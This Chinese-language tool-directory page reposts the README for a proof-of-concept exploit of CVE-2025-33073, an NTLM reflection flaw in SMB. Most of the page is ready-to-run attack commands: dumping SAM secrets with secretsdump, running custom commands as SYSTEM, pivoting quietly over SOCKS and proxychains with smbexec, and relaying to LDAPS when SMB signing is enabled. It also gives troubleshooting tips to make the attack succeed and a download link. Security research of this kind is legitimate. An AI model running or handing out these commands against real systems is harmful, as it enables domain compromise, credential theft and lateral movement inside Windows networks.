Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-33073 — 针对NTLM反射SMB漏洞的PoC利用代码 | Kitploit
工具/GitHubGitHub/mverschu/cve-2025-33073
权限提升漏洞分析漏洞利用网络安全渗透测试身份验证
GitHubmverschu/cve-2025-33073

CVE-2025-33073

针对NTLM反射SMB漏洞的PoC利用代码

查看仓库
7141366个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-33073

针对NTLM反射SMB漏洞的PoC利用程序。

图片

所有功劳归功于官方研究:
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

先决条件

操作系统:Kali Linux(已预装大多数软件包)。

  • NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
  • impacket-ntlmrelayx
  • dnstool.py(包含在仓库中)

设置

该工具将自动使用虚拟环境。要设置它,请运行:

root@kitploit:~
./setup.sh

这将创建一个虚拟环境,并安装所有必需的依赖项,包括 ldap3-bleeding-edge==2.10.1.1337。

使用示例

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
图片

自定义命令
除了运行secretsdump,还可以执行自定义命令。

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"

图片

SOCKS
为了在成功建立SYSTEM连接后更隐蔽地执行命令。--target和--target-ip在此处应相同。

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks

图片 还可以通过proxychains运行自定义命令,而不是转储SAM。

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

图片

即使启用SMB签名,也可利用中继到LDAPS

已进行相关研究,以验证当SMB签名启用时反射是否确实无效,结果发现了漏洞:如果从数据包中移除SIGN/SEAL,则可以从SMB中继到LDAPS,而通常由于MIC这是不可能的。

感谢:

  • https://github.com/decoder-it/impacket-partial-mic/
  • https://decoder.cloud/2025/11/24/reflecting-your-authentication-when-windows-ends-up-talking-to-itself/
  • https://www.depthsecurity.com/blog/using-ntlm-reflection-to-own-active-directory/
root@kitploit:~
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
图片

无需DNS的手动利用

如果您与设备处于同一广播域,并且该设备容易受到LLMNR投毒攻击,则可以在无需注册DNS记录的情况下利用该设备。

图片

故障排除

  • 有时攻击失败是因为使用主机名进行攻击,导致Kali进行DNS查找。如果Kali未使用该DNS服务器,或者您从impacket-ntlmrelayx收到'/ FAILED'消息,请尝试将主机添加到您的/etc/hosts文件中。这应能使攻击生效。
  • 如果使用IP,攻击应能正常工作。有时多次运行会成功而非失败。目前尚不完全清楚原因,我认为与网络有关。
  • 尝试使用 -M 或 --method 指定其他强制方法。

Wireshark

进行本地NTLM身份验证 图片

未进行本地NTLM身份验证,导致尝试失败 图片

须知

  • DNS记录也应对客户端已知,在某些情况下这可能需要更多时间。所谓更多时间,我指的是等待几分钟。
  • 这只是一个概念验证(PoC),意味着尚未尝试绕过AV/EDR。请自行承担使用风险。

如何修复

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073

下载工具